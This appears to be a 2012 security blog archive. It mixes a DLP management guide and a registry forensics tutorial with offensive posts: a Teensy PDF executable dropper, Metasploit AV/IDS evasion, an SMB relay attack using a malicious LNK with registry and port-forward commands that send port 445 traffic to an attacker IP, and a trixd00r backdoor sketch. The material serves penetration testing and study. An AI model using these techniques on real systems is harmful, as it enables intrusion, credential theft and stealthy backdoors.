Monday, February 27, 2012

Teensy PDF Dropper Part 2

Last year Stevens showed how to use a Teensy microcontroller to drop a PDF file with an embedded executable. But he was limited to a file of a few kilobytes because of the Arduino programming language he used for the Teensy.

In this post, he uses WinAVR, and the size is now limited only by the amount of flash memory on the Teensy++.

First we use a new version of my PDF tools to create a PDF file with an embedded file:

Filter i is exactly like filter h (ASCIIHexDecode), except that the lines of hex code are wrapped at 512 hex digits, making them digestible to our C compiler.
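The wrapping step itself is simple. The sketch below is illustrative only (the actual PDF tools are Python, and `hex_wrap` is a hypothetical name, not a function from them): it hex-encodes a buffer and breaks the output into lines of a fixed number of hex digits.

```c
#include <stdio.h>
#include <string.h>

/* Hex-encode len bytes of data into out, inserting a newline after
 * every `wrap` hex digits (wrap must be even; filter i uses 512).
 * Returns the number of characters written, excluding the NUL.
 * Sketch only -- the real tools are Python, not C. */
size_t hex_wrap(const unsigned char *data, size_t len, size_t wrap, char *out)
{
    static const char digits[] = "0123456789ABCDEF";
    size_t written = 0, col = 0;

    for (size_t i = 0; i < len; i++) {
        out[written++] = digits[data[i] >> 4];
        out[written++] = digits[data[i] & 0x0F];
        col += 2;
        if (col == wrap && i + 1 < len) {   /* wrap, but no trailing newline */
            out[written++] = '\n';
            col = 0;
        }
    }
    out[written] = '\0';
    return written;
}
```

Each resulting line fits comfortably inside a C string literal, which is what makes the stream digestible to the compiler.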

Another new feature of my make PDF tools is Python 3 support.

Here is a sample of our C code showing how to embed each line of the pure-ASCII PDF document as strings:

The PSTR macro ensures that the string is stored in flash memory. The embedded executable is 57 KB, but still takes up only half of the flash memory of my Teensy++.
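The C listing itself appears as an image in the original post; roughly, the approach looks like the following sketch. The `send_line` helper and `type_pdf` are hypothetical names standing in for whatever USB-keyboard typing routine the real code uses; for a host build, PSTR is stubbed out so the sketch stays compilable.

```c
#include <stdio.h>

/* On the Teensy, <avr/pgmspace.h> provides PSTR() to keep string
 * literals in flash instead of RAM; on a host build we stub it out
 * so this sketch stays compilable. */
#ifdef __AVR__
#  include <avr/pgmspace.h>
#else
#  define PSTR(s) (s)
#endif

static int lines_sent = 0;

/* Hypothetical stand-in for the USB-keyboard typing routine in the
 * real code: on the Teensy this would send keystrokes; here it just
 * prints the line and counts it. */
static void send_line(const char *s)
{
    puts(s);
    lines_sent++;
}

/* One call per line of the pure-ASCII PDF document. */
void type_pdf(void)
{
    send_line(PSTR("%PDF-1.1"));
    send_line(PSTR("1 0 obj"));
    send_line(PSTR("<</Type /Catalog /Pages 2 0 R>>"));
    /* ... remaining lines of the PDF, including the wrapped
     * ASCIIHexDecode stream of the embedded executable ... */
    send_line(PSTR("%%EOF"));
}
```

Because every literal lives in flash, RAM usage stays tiny no matter how large the embedded document grows.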

After programming my Teensy++, I can fire up Notepad and let my Teensy++ type out the PDF document:

You can download my example for the WinAVR compiler here: (https)

MD5: EA14100A1BEDA4614D1AE9DE0F71B747

SHA256: 2C9A5DF1831B564D82548C72F1050737BCF17E5A25DCDC41D7FA4EA446A8FDED

Thursday, February 23, 2012

Implementing DLP: Ongoing Management

Managing DLP tends to not be overly time consuming unless you are running off badly defined policies. Most of your time in the system is spent on incident handling, followed by policy management.

To give you some numbers, the average organization can expect to need about the equivalent of one full-time person for every 10,000 monitored employees. This is really just a rough starting point; we've seen ratios as low as 1/25,000 and as high as 1/1,000, depending on the nature and number of policies.

Managing Incidents

After deployment of the product and your initial policy set, you will likely need fewer people to manage incidents than you might expect. Even as you add policies you might not need additional people, since just having a DLP tool and managing incidents improves user education and reduces the number of incidents.

Here is a typical process:

Manage incident handling queue

The incident handling queue is the user interface for managing incidents. This is where the incident handlers start their day, and it should have some key features:

  • Ability to customize the incident view for the individual handler. Some are more technical and want to see detailed IP addresses or machine names, while others focus on users and policies.

  • Incidents should be pre-filtered based on the handler. In a larger organization this allows you to automatically assign incidents based on the type of policy, business unit involved, and so on.

  • The handler should be able to sort and filter at will, especially to sort based on the type of policy or the severity of the incident (usually the number of violations, e.g. a million account numbers in a file versus 5).

  • Support for one-click dispositions to close, assign, or escalate incidents right from the queue as opposed to having to open them individually.

Most organizations tend to distribute incident handling among a group of people as only part of their job. Incidents will be either automatically or manually routed around depending on the policy and the severity. Practically speaking, unless you are a large enterprise this could be a part-time responsibility for a single person, with some additional people in other departments like legal and human resources able to access the system or reports as needed for bigger incidents.

Initial investigation

Some incidents might be handled right from the initial incident queue; especially ones where a blocking action was triggered. But due to the nature of dealing with sensitive information there are plenty of alerts that will require at least a little initial investigation.

Most DLP tools provide all the initial information you need when you drill down on a single incident. This may even include the email or file involved, with the policy violations highlighted in the text. The job of the handler is to determine whether this is a real incident, its severity, and how to handle it.

Useful information at this point is a history of other violations by that user and other violations of that policy. This helps you determine if there is a bigger issue/trend. Technical details will help you reconstruct more of what actually happened, and all of this should be available on a single screen to reduce the amount of effort needed to find the information you need.

If the handler works for the security team, he or she can also dig into other data sources if needed, such as a SIEM or firewall logs. This isn’t something you should have to do often.

Initial disposition

Based on the initial investigation the handler closes the incident, assigns it to someone else, escalates to a higher authority, or marks it for a deeper investigation.

Escalation and Case Management

Anyone who deploys DLP will eventually find incidents that require a deeper investigation and escalation. And by “eventually” we mean “within hours” for some of you.

DLP, by its nature, will find problems that require investigating your own employees. That's why we emphasize having a good incident handling process from the start, since these cases might lead to someone being fired. When you escalate, consider involving legal and human resources. Many DLP tools include case management features so you can upload supporting documentation and produce needed reports, plus track your investigative activities.


The last (incredibly obvious) step is to close the incident. You'll need to determine a retention policy, and if your DLP tool doesn't support your retention needs you can always output a report with all the salient incident details.

As with a lot of what we've discussed, you'll probably handle most incidents within minutes (or less) in the DLP tool, but we've detailed a common process for those times you need to dig in deeper.


Most DLP systems keep old incidents in the database, which will obviously fill it up over time. Periodically archiving old incidents (such as anything 1 year or older) is a good practice, especially since you might need to restore the records as part of a future investigation.

Managing Policies

Anytime you look at adding a significant new policy you should follow the Full Deployment process we described above, but there are still a lot of day to day policy maintenance activities. These tend not to take up a lot of time, but if you skip them for too long you might find your policy set getting stale and either not offering enough security, or causing other issues due to being out of date.

Policy distribution

If you manage multiple DLP components or regions you will need to ensure policies are properly distributed and tuned for the destination environment. If you distribute policies across national boundaries this is especially important since there might be legal considerations that mandate adjusting the policy.

This includes any changes to policies. For example, if you adjust a US-centric policy that's been adapted to other regions, you'll then need to update those regional policies to maintain consistency. If you manage remote offices with their own network connections, you want to make sure policy updates are pushed out properly and consistently.

Adding policies

Brand new policies will take the same effort as the initial policies, except that you'll be more familiar with the system. Thus we suggest you follow the Full Deployment process again.

Policy reviews

As with anything, today's policy might not apply the same in a year, or two, or five. The last thing you want to end up with is a disastrous mess of stale, yet highly customized and poorly understood, policies, as you often see on firewalls.

Reviews should consist of:

  • Periodic reviews of the entire policy set to see if it still accurately reflects your needs and if new policies are required, or older ones should be retired.

  • Scheduled reviews and testing of individual policies to confirm that they still work as expected. Put it on the calendar when you create a new policy to check it at least annually. Run a few basic tests, and look at all the violations of the policy over a given time period to get a sense of how it works. Review the users and groups assigned to the policy to see if they still reflect the real users and business units in your organization.

  • Ad hoc reviews when a policy seems to be providing unexpected results. A good tool to help figure this out is your trending reports; any big changes or deviations from a trend are worth investigating at the policy level.

  • Policy reviews during product updates, since these may change how a policy works or give you new analysis or enforcement options.

Updates and tuning

Even effective policies will need periodic updating and additional tuning. While you don’t necessarily need to follow the entire Full Deployment process for minor updates, they should still be tested in a monitoring mode before you move into any kind of automated enforcement.

Also make sure you communicate any noticeable changes to affected business units so you don't catch them by surprise. We've heard plenty of examples of someone in security flipping a new enforcement switch or changing a policy in a way that really impacted business operations. Maybe that's the goal, but it's always best to communicate and hash things out ahead of time.

If you find a policy really seems ineffective then it’s time for a full review. For example, we know of one very large DLP user who had unacceptable levels of false positives on their account number protection due to the numbers being too similar to other numbers commonly in use in regular communications. They solved the problem (after a year or more) by switching from pattern matching to a database fingerprinting policy that checked against the actual account numbers in a customer database.

Retiring policies

There are a lot of DLP policies you might use for a limited time, such as a partial document matching policy to protect corporate financials before they are released. After the release date, there’s no reason to keep the policy.

We suggest you archive these policies instead of deleting them. And if your tool supports it, set expiration dates on policies… with notification so it doesn’t shut down and leave a security hole without you knowing about it.

Backup and archiving

Even if you are doing full system backups it’s a good idea to perform periodic policy set backups. Many DLP tools offer this as part of the feature set. This allows you to migrate policies to new servers/appliances or recover policies when other parts of the system fail and a full restore is problematic.

We aren’t saying these sorts of disasters are common; in fact we’ve never heard of one, but we’re paranoid security folks.

Archiving old policies also helps if you need to review them while reviewing an old incident as part of a new investigation or a legal discovery situation.


Analysis, as opposed to incident handling, focuses on big-picture trends. We suggest three kinds of analysis:

Trend analysis

Often built into the DLP server’s dashboard, this analysis looks across incidents to evaluate overall trends such as:

  • Are overall incidents increasing or decreasing?

  • Which policies are generating more or fewer incidents over time?

  • Which business units experience more incidents?

  • Are there any sudden increases in violations by a business unit, or of a policy, that might not be seen if overall trends aren’t changing?

  • Is a certain type of incident tied to a business process that should be changed?

The idea is to mine your data to evaluate how your risk is increasing or decreasing over time. When you’re in the muck of day to day incident handling it’s often hard to notice these trends.

Risk analysis

A risk analysis is designed to show what you are missing. DLP tools only look for what you tell them to look for, and thus won’t catch unprotected data you haven’t built a policy for.

A risk analysis is essentially the Quick Wins process. You turn on a series of policies with no intention of enforcing them, but merely to gather information and see if there are any hot spots you should look at more in depth or create dedicated policies for.

Effectiveness analysis

This helps assess the effectiveness of your DLP tool usage. Instead of looking at general reports, think of it as testing the tool again. Try some common scenarios to circumvent your DLP to figure out where you need to make changes.

Content discovery/classification

Content discovery is the process of scanning storage for the initial identification of sensitive content and tends to be a bit different than network or endpoint deployments. While you can treat it the same, identifying policy violations and responding to them, many organizations view content discovery as a different process, often part of a larger data security or compliance project.

Content discovery projects will often turn up huge amounts of policy violations due to files being stored all over the place. Compounding the problem is the difficulty of identifying the file owner or the business unit that's using the data, and why they have it. Thus you tend to need more analysis, at least on your first run through a server or other storage repository, to find the data, identify who uses and owns it, the business need (if any), and alternative options to keep the data more secure.


We’ve covered most non-product-specific troubleshooting throughout this series. Problems people encounter tend to fall into the following categories:

  • Too many false positives or negatives, which you can manage using our policy tuning and analysis recommendations.

  • System components not talking to each other. For example, some DLP tools separate out endpoint and network management (often due to acquiring different products) and then integrate them at the user interface level. Unless there is a simple network routing issue, fixing these may require the help of your vendor.

  • Component integrations to external tools like web and email gateways may fail. Assuming you were able to get them to talk to each other previously, the culprit is usually a software update introducing an incompatibility. Unfortunately, you’ll need to run it down in the log files if you can’t pick out the exact cause.

  • New or replacement tools may not work with your existing DLP tool. For example, swapping out a web gateway or using a new edge switch with different SPAN/Mirror port capabilities.

We really don’t hear about too many problems with DLP tools outside of getting the initial installation properly hooked into infrastructures and tuning policies.

Maintenance for DLP tools is relatively low, consisting mostly of five activities (two of which we already discussed):

  • Full system backups, which you will definitely do for the central management server, and possibly any remote collectors/servers depending on your tool. Some tools don’t require this since you can swap in a new default server or appliance and then push down the configuration.

  • Archiving old incidents to free up space and resources. But don’t be too aggressive since you generally want a nice library of incidents to support future investigations.

  • Archiving and backing up policies. Archiving policies means removing them from the system, while backups include all the active policies. Keeping these separate from full system backups provides more flexibility for restoring to new systems or migrating to additional servers.

  • Health checks to ensure all system components are still talking to each other.

  • Updating endpoint and server agents to the latest versions (after testing, of course).


Ongoing reporting is an extremely important aspect of running a Data Loss Prevention tool. It helps you show management and other stakeholders that you, and your tool, are providing value and managing risk.

At a minimum you should produce quarterly, if not monthly, rollup reports summarizing trends and overall activity. Ideally you'll show decreasing policy violations, but if there is an increase of some sort you can use that to get the resources to investigate the root cause.

You will also produce a separate set of reports for compliance. These may be on a project basis, tied to any audit cycles, or scheduled like any other reports. For example, running quarterly content discovery reports showing you don’t have any unencrypted credit card data in a storage repository and providing these to your PCI assessor to reduce potential audit scope. Or running monthly HIPAA reports for the HIPAA compliance officer (if you work in healthcare).

Although you can have the DLP tool automatically generate and email reports, depending on your internal political environment you might want to review these before passing them to outsiders in case there are any problems with the data. Also, it's never a good idea to name employees in general reports; keep identifications to incident investigations and case management summaries that have a limited audience.

Saturday, February 18, 2012

How to Fly Under the Radar of AV and IPS with Metasploit's Stealth Features

When conducting a penetration testing assignment, one objective may be to get into the network without tripping any of the alarms, such as IDS/IPS or anti-virus. Enterprises typically add this to the requirements to test whether their defenses are good enough to detect an advanced attacker. Here's how to sneak in and out without "getting caught".

Scan speed

First of all, bear in mind that you'll want to slow down your initial network scan so you don't raise suspicion by creating heavy network traffic. In the Advanced Settings of the Discovery Scan, set your network scanning speed to Sneaky or Paranoid. This feature is included in Metasploit Community Edition, Metasploit Express, and Metasploit Pro.


Evading IDS/IPS

Metasploit has many different settings to evade an IDS/IPS (intrusion detection system/intrusion prevention system).

Metasploit Framework enables you to set many of these manually, for example changing the transport type, the encoding, or fragmenting traffic. Finding the right settings to evade an IPS can be a little tricky.

If you want to make your life easier, you can use Metasploit Pro's pre-defined levels of evasion: You can choose Transport Evasions, and Application Evasions, all of which have the options of None, Low, Medium, and High. In the back-end, the tuning is different for each type of exploit. For example, if you’re choosing low transport evasion, it will run the exploit a little slower and chunk it up into more segments. With higher options, we change exploit-specific settings, like the compression type, the name of the webserver, or use different Unicode encodings.

You can set these IDS/IPS evasion settings in the Advanced Options of the Exploitation screen:

  • Concurrent exploits: Reduces the number of exploits that are launched at your targets at the same time. Reduce this to ensure the attack doesn't raise any red flags.
  • Transport evasion: Sends smaller TCP packets and increases time delay between packets to avoid detection.
  • Application Evasion: Adjusts application-specific evasion options for exploits involving DCERPC, SMB and HTTP. The higher the setting, the more evasion techniques are applied.


Social engineering

When choosing the payload for social engineering campaigns, you should choose Encrypted HTTPS to ensure that your payload phones back using an encrypted session. These sessions are harder for your IDS/IPS to detect. Social engineering campaigns are only available in Metasploit Pro.


Avoiding anti-virus

Even if you get past the IDS/IPS systems on the network, the anti-virus engine on the machine you're trying to exploit may stop your attack if you're not careful. A lot of AV vendors flag Metasploit exploits and payloads as malware because they can be used in an attack. That is also a reason why you shouldn't have a malware scanner installed on the machine you run Metasploit on; otherwise it may block your installation or exploits. If you must have an AV solution installed, ensure that you have excluded the Metasploit directory from its scans.

Metasploit includes various ways to avoid anti-virus detection, which again differ between editions. Metasploit Framework and Metasploit Community share the same basic AV evasion. Metasploit Express adds a self-signed binary and templates to evade detection by anti-virus solutions. Metasploit Pro includes a Rapid7-signed binary to inject code that bypasses a white list and a persistent agent that is compiled differently every time, making it very hard to detect. To get an impression how successful Metasploit is in evading anti-virus, check out the results from our test lab in the blog post "Become invisible to anti-virus protection".

How are your defenses holding up to advanced evasion techniques?

Adventures in the Windows NT Registry: A step into the world of Forensics and Information Gathering


As of a few days ago, the Metasploit Framework has full read-only access to offline registry hives. Within Rex you will now find a Rex::Registry namespace that will allow you to load and parse offline NT registry hives (includes Windows 2000 and up), implemented in pure Ruby. This is a great addition to the framework because it allows you to be sneakier and more stealthy while gathering information on a remote computer. You no longer need to rely on arcane Windows APIs with silly data structures and you can interact with the registry hives in an object-oriented manner. Combined with the recent ShadowCopy additions from TheLightCosine, you have a very powerful forensics suite at your fingertips.

Before I get ahead of myself, I should explain exactly what the registry is and why it matters.

When you open up regedit on a Windows computer, regedit is actually opening many different registry hives. A registry hive is a binary file that is stored either in C:\Windows\System32\config (SYSTEM, SOFTWARE, SAM, SECURITY) or in a user's profile (NTUSER.dat). These hives store system information and configurations, user information, and all sorts of just interesting information (group policy settings for instance). These files are locked while Windows is running. In the past, we have used methods like exporting specific hives in order to get around this lock, and this still works well enough. We now have the option of using the Volume Snapshot Service, or VSS, to create a copy of a hive while locked. However, there has been no good way to analyse and parse these hives on a system that wasn't running Windows after copying them.

The easiest way is to create copies of the hives and pull them down to your local machine in a centralised place. I used 'reg SAVE HKLM\$HIVE $HIVE.hive', substituting $HIVE for the actual hive name, then downloaded the copied hives with meterpreter.

root@w00den-pickle:/home/bperry/Projects/new_hives# file ./* 
./sam.hive: MS Windows registry file, NT/2000 or above
./security.hive: MS Windows registry file, NT/2000 or above
./software.hive: MS Windows registry file, NT/2000 or above
./system.hive: MS Windows registry file, NT/2000 or above

You will find a new tool within the source tree called reg.rb (tools/reg.rb). This script consumes the Rex::Registry library and has many predefined methods to help speed up information gathering. Work is still being done on reg.rb; it has a lot of potential. Ideas or functionality requests are appreciated. Patches too.

A small primer on how the registry stores data is in order. Within a registry hive, you have five value types:

  • 0x01 -- "Unicode character string"
  • 0x02 -- "Unicode string with %VAR% expanding"
  • 0x03 -- "Raw binary value"
  • 0x04 -- "Dword"
  • 0x07 -- "Multiple unicode strings separated with '\\x00'"

Types 1, 2, and 7 can be printed to a screen in a readable form without much issue. Types 3 and 4, however, are binary types and will be printed out in their base16 representations (\xde\xad\xbe\xef). Keep this in mind when querying values from a registry hive.
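For example, a type 0x04 (Dword) value is four little-endian bytes, so the base16 form "\x01\x00\x00\x00" is simply the integer 1. A small C helper makes the decoding explicit (illustrative only; reg.rb and Rex::Registry are Ruby, and `reg_dword` is not a function from them):

```c
#include <stdint.h>

/* Decode a 4-byte REG_DWORD value as stored in a hive (little-endian)
 * into a host integer. Illustrative sketch -- the actual library is Ruby. */
uint32_t reg_dword(const unsigned char *data)
{
    return (uint32_t)data[0]
         | ((uint32_t)data[1] << 8)
         | ((uint32_t)data[2] << 16)
         | ((uint32_t)data[3] << 24);
}
```

This is why the Default Control Set query below returns "\x01\x00\x00\x00": it is a Dword with the value 1.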

For instance, let's say we need to find out the Default Control Set in order to query correct values pertaining to drivers or the boot key. Your query would look similar to this:

root@w00den-pickle:~/tools/metasploit-framework/tools# ./reg.rb query_value '\Select\Default' /home/bperry/Projects/new_hives/system.hive
Hive name: SYSTEM
Value Name: Default
Value Data: "\x01\x00\x00\x00"

This tells us that the Default Control Set is ControlSet001. When we query the root key ('', "", '\', or "\\") of the SYSTEM hive, we will see the available ControlSets:

root@w00den-pickle:~/tools/metasploit-framework/tools# ./reg.rb query_key '' /home/bperry/Projects/new_hives/system

Hive name: SYSTEM

Child Keys for

Name                   Last Edited                Subkey Count  Value Count
----                   -----------                ------------  -----------
ControlSet001          2010-08-21 08:56:36 -0500  4             0
ControlSet002          2010-08-21 16:05:32 -0500  4             0
LastKnownGoodRecovery  2011-12-13 21:22:55 -0600  1             0
MountedDevices         2010-08-21 08:56:18 -0500  0             4
Select                 2010-08-21 16:05:32 -0500  0             4
Setup                  2010-08-21 16:05:33 -0500  4             6
WPA                    2010-08-21 16:08:33 -0500  4             0

Values in key

Name  Value Type  Value
----  ----------  -----

When querying the hives, the library queries relatively from the root key. On XP machines, the root key is always named $$PROTO.HIV. On Vista+, the root key is always named along the lines of CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}. The GUID will be variable. This is important to note because many times a key will be given to you in this form:

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall
In the above example, there are actually three parts. HKLM stands for HKEY_LOCAL_MACHINE. This tells regedit to load the local registry hives. The second part, Software, tells regedit the key is in the SOFTWARE hive. The third part, Microsoft\Windows\CurrentVersion\Uninstall, is the actual key path relative to the root key in the hive. Since reg.rb only looks at arbitrary hives, the first two parts aren't needed.

If you were to query the above key with reg.rb, the command would look like this:

reg.rb query_key '\Microsoft\Windows\CurrentVersion\Uninstall' /path/to/hive/SOFTWARE

This would enumerate the installed programs on the computer along with the date and time the key was created. Generally, the keys in the above key are created when the program is installed, so you can see how long a program has been installed on a computer as well.

The library also allows you to query for data that would otherwise be hidden. Each nodekey has the ability to have a classname. This classname isn't shown in regedit, and some very important information can be held in this container. For instance, the boot key is stored in 4 separate key classnames that would otherwise not be accessible. reg.rb allows you to query for the boot key easily:

root@w00den-pickle:~/tools/metasploit-framework/tools# ./reg.rb get_boot_key /home/bperry/tmo/hives/SYSTEM
Getting boot key
Root key: CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
Default ControlSet: ControlSet001

Accessing the hives programmatically

You may find yourself wanting to work with the hives programmatically, via a resource script with ERB, or straight from irb. The main class you will be working with is Rex::Registry::Hive. You perform queries directly off of the hive object.

msf > irb
[*] Starting IRB shell...

>> require 'rex/registry'
=> true
>> hive ='/home/bperry/tmo/hives/SYSTEM'); nil
=> nil
>> hive.hive_regf.hive_name
=> "CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}"

In the above example, we create a new hive object. Every hive has a root key and begins with a regf block (which tells you the name of the hive, among other things). A root key is simply a nodekey with a special flag.

>> hive.root_key.lf_record.children.each { |k| p }; nil
=> nil

Every nodekey will have either an lf_record or a valuelist (or both!). The lf_record contains the child nodekeys. The valuelist contains the child values.

>> valuekey = hive.value_query('\Select\Default'); nil

=> nil

>> nodekey = hive.relative_query('\ControlSet001\Control\Lsa'); nil

The value_query method of the hive returns a ValueKey. The relative_query method returns a NodeKey. Performing a relative_query on a value's path rather than a node's path will return the value's parent node.

As you can see, the library is quite powerful. It gives you a lot of control over your offline hives when performing forensics or information gathering. There is a lot of work to be done, with write support very possible in the future. I look forward to seeing what cool modules the community can cook up that utilize the library. Be sure to update the framework to its latest version to ensure you have the most up-to-date library to play with.

Wednesday, February 15, 2012

Blade™ v1.9 Released - AFF® Support, Hiberfile.sys Conversion and New Evaluation Version

Blade v1.9 Released

This is the first release of Blade to have evaluation capabilities which allow the user to test and evaluate our software for 30 days. When Blade is installed on a workstation for the first time (and a valid USB dongle licence is not inserted) the software will function in evaluation mode.

The following list contains a summary of the new features:

  • Support for Advanced Forensic Format (AFF®)
  • Hiberfil.sys converter - supports XP, Vista, Windows 7 32 and 64bit
  • Accurate hiberfil.sys memory mapping, not just Xpress block decompression
  • Hiberfil.sys slack recovery
  • Codepage setting for enhanced multi-language support
  • SQLite database recovery
  • 30 Day evaluation version of Blade Professional
  • New recovery profile parameters for more advanced and accurate data recovery
  • Support for Logicube Forensic Dossier®
  • Support for OMA DRM Content Format for Discrete Media Profile (DCF)

We have also been working on the data recovery engines to make them more efficient and much faster than before. The searching speed has been significantly increased.

Downloads and Full Release Information

HconSTF: Security Testing Framework

HCON is a security framework. This latest release is a portable penetration testing environment capable of assisting in all tasks of a penetration test or vulnerability assessment, and more. It has two versions, based on the Firefox and Chromium source code, called Fire and Aqua respectively.

Most of HconSTF is semi-automated, but you still need your brain to work it out. It can be used in all kinds of security testing stages, and it has tools for conducting tasks like:

  1. Information gathering
  2. Enumeration & Reconnaissance
  3. Vulnerability assessment
  4. Exploitation
  5. Privilege escalation
  6. Reporting
  7. Web debugging

Key Features of HconSTF

  • Categorized and comprehensive toolset
  • Contains hundreds of tools, features, and scripts for different tasks like SQLi, XSS, dorks, and OSINT, to name a few
  • HconSTF webUI with online tools (same as the Aqua base version of HconSTF)
  • Each and every option is configured for penetration testing and vulnerability assessments
  • Specially configured and enhanced for gaining easy & solid anonymity
  • Works for web app testing assessments, especially for the OWASP Top 10
  • Easy to use & collaborative Operating System like interface
  • Light on Hardware Resources
  • Portable – no need to install, can work from any USB storage device
  • Multi-language support (feature in heavy development; translators needed)
  • Works side-by-side with your normal web browser without any conflict issues
  • Works on both x86 & x64 architectures on Windows XP, Vista, and 7 (works with Ubuntu Linux using Wine)
  • Netbook compatible – User interface is designed for using framework on small screen sizes
  • Free & Open source and always will be

As a tribute to the freedom fighters of all countries, HconSTF version 0.4, codenamed 'Freedom', was made available on Indian Republic Day. This release integrates many functions for anonymity and OSINT.

Download HconSTF:


Tuesday, February 14, 2012

BFT: Browser forensic tool

Browser Forensic Tool is software that searches all kinds of browser history, even archived history, in a few seconds. It retrieves the URLs and titles of all entries matching the chosen keywords. You can use the default example profiles or create your own, with thematic searches on a single click. This tool comes from the developer of the famous DarkComet RAT. Browsers supported by BFT include IE, Firefox, Chrome, and Opera.
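The core of such a tool is simple: open each browser's history store and filter entries by keyword. Here is a minimal sketch for Firefox, whose history lives in a SQLite database (`places.sqlite`, `moz_places` table); BFT's actual implementation and the other browsers' formats differ:

```python
import sqlite3

def search_history(db_path, keywords):
    """Return (url, title) rows from a Firefox places.sqlite whose URL or
    title contains any of the given keywords (case-insensitive)."""
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute("SELECT url, title FROM moz_places").fetchall()
    finally:
        con.close()
    hits = []
    for url, title in rows:
        haystack = ((url or "") + " " + (title or "")).lower()
        if any(k.lower() in haystack for k in keywords):
            hits.append((url, title))
    return hits
```

Chrome keeps an equivalent `urls` table in its own SQLite `History` file, so the same approach carries over with a different path and query.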

Monday, February 13, 2012

MS08_068 + MS10_046 = FUN UNTIL 2018


TL;DR: SMB Relay + LNK UNC icons = internal pentest pwnage

I need to touch on the highlights of two vulnerabilities before we talk about the fun stuff, but I highly encourage you to read the references at the bottom of this post and understand the vulnerabilities after you are done with my little trick, as you might find one of your own.


In 2008, Microsoft released MS08_068, which patched the "SMB Relay" attack. To boil this down: an attacker gets a victim to attempt to authenticate to an attacker-controlled box. The attacker delays its responses to the victim and replays the important parts of the authentication the victim sent back at the victim. You can find out a lot more about this vulnerability here:

One thing to take away from that post is that the patch stops Attacker <=> Victim, but does not / cannot fix Victim <=> Attacker <=> Victim2 (using the authentication from Victim to replay against Victim2)
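Conceptually, the attacker's box is just a man-in-the-middle shuttling the authentication exchange between Victim and Victim2. A minimal sketch of only the transport plumbing (none of the NTLM parsing or replay logic a real SMB relay needs) might look like:

```python
import socket
import threading

def pump(src, dst):
    # Forward bytes until src closes, then half-close dst.
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass

def relay_one(listen_sock, target_addr):
    """Accept a single connection and shuttle bytes to/from target_addr.
    A real SMB relay additionally inspects the NTLM messages flowing
    through and replays the challenge/response at the target."""
    client, _ = listen_sock.accept()
    upstream = socket.create_connection(target_addr)
    t = threading.Thread(target=pump, args=(client, upstream))
    t.start()
    pump(upstream, client)
    t.join()
    client.close()
    upstream.close()
```

The interesting part of the attack is what happens inside that pipe, not the pipe itself, which is why the MS08_068 fix (tying the challenge back to the originating host) stops the reflection case but not the three-party one.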


In 2010, Microsoft released MS10_046, which patched the Stuxnet LNK vulnerability, where a malicious DLL could be loaded (locally or remotely over WebDAV) using the path of the shortcut's icon reference. LNK files are Windows shortcut files that allow the icons of the files to be changed much more dynamically than any other file type (right-click a shortcut, go to Properties, and simply click the 'Change Icon' button). I could certainly be wrong here, but I believe all Microsoft patched was the ability to use this feature to load DLLs via a certain Control Panel object, which leaves the ability to load shortcut (LNK) icons from wherever we wish. ;-)

The Setup:

If you are on an internal penetration test and either exploit a machine or find an open share, you can create an LNK file whose icon points at a nonexistent share on your attacking machine's IP, and use SMB_Relay to replay those credentials to a system you've identified, by one means or another, as an 'important' host to get on.

Attacker uploads malicious LNK file to network share on FILE SHARE

Victim views it on WORKSTATION, which initiates a connection to ATTACKER

Attacker relays those authentication attempts to FILE SHARE, gaining code execution if 'Victim' is an admin on FILE SHARE

If not, the NetNTLM hashes are still visible in the logs and you can attempt to crack them, or just wait for more people to view the LNK file on the public share and hope that an admin comes by at some point.

Your mileage will vary based on where you put the LNK file.

The Video:

I have created a post module to automate the process of creating and uploading the LNK file (so you don't have to have a Windows box lying around). Here it is in action:

Module options (post/windows/escalate/droplnk):

Name          Current Setting  Required  Description
----          ---------------  --------  -----------
ICONFILENAME  icon.png         yes       File name on LHOST's share
LHOST                          yes       Host listening for incoming SMB/WebDAV traffic
LNKFILENAME   Words.lnk        yes       Shortcut's filename
SESSION       1                yes       The session to run this module on
SHARENAME     share1           yes       Share name on LHOST

post(droplnk) > run

[*] Creating evil LNK
[*] Done. Writing to disk - C:\DocuMe~1\Administrator\\Words.lnk
[*] Done. Wait for evil to happen..
[*] Post module execution completed

You can find the code here:

Going forward:

Obviously this isn't so effective remotely out of the box, and there currently isn't an SMB_Relay for WebDAV (although I'm guessing that would work). However, I was able to get SMB relaying working in a crude way, using some pretty loud system changes on an exploited host:

  • Step 1: Disable SMB on port 445 (it will still operate on 139, as that is a failover). This setting requires a reboot to take effect and can be done using the following command:

    • reg add HKLM\System\CurrentControlSet\Services\NetBT\Parameters /v SMBDeviceEnabled /t REG_DWORD /d 0

  • Step 2: Port forward the traffic out to your remote attacker host over a port that is allowed out; I used 80:

    • netsh interface portproxy add v4tov4 listenport=445 connectaddress=<attacker IP> connectport=80

  • Step 3: Set up SMB_Relay listening on that port on your attacker with a route in meterpreter to send all relayed authentication through your meterpreter session into and at the targeted host.

These steps can get you noticed in almost every way, so they're not recommended; I just did it as a PoC. I mean, how cool is it to remotely exploit SMB vulns ;-)

The other thing is that admin users are becoming rarer as the years go by, and people use lower-privilege accounts for their daily tasks. So there are currently feature requests in to the Metasploit project so that when SMB_Relay correctly forwards good credentials, even if they aren't admin and you can't get code execution, you could still go through the files that person has access to on the targeted system / file share. A final pipe dream of this post is a multi-threaded smb_relay that can target 2, 3 or even 10 servers with the relayed authentication.

Just sayin'… /me nudges the Metasploit devs…


SMB_Relay References:

LNK DLL Loader References:

Trixd00r Backdoor for Linux: How to Set Up Trixd00r to Hack a Remote Computer

trixd00r is an advanced and invisible userland backdoor based on TCP/IP for UNIX systems. It consists of a server and a client. The server sits and waits for magic packets using a sniffer. If a magic packet arrives, it will bind a shell over TCP or UDP on the given port, or connect back to the client, again over TCP or UDP. The client is used to send magic packets to trigger the server and get a shell.
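The trigger mechanism can be illustrated in a few lines of Python. This sketch only shows the idea of waiting for a magic value on a socket; trixd00r itself sniffs raw packets rather than binding a port, and the magic value here is invented:

```python
import socket

MAGIC = b"\x13\x37MAGIC"  # illustrative trigger value, not trixd00r's

def wait_for_magic(port, timeout=5.0):
    """Block until a UDP datagram carrying the magic value arrives and
    return the sender's address. Only the trigger is sketched here; the
    real tool would then bind a shell or connect back to that address."""
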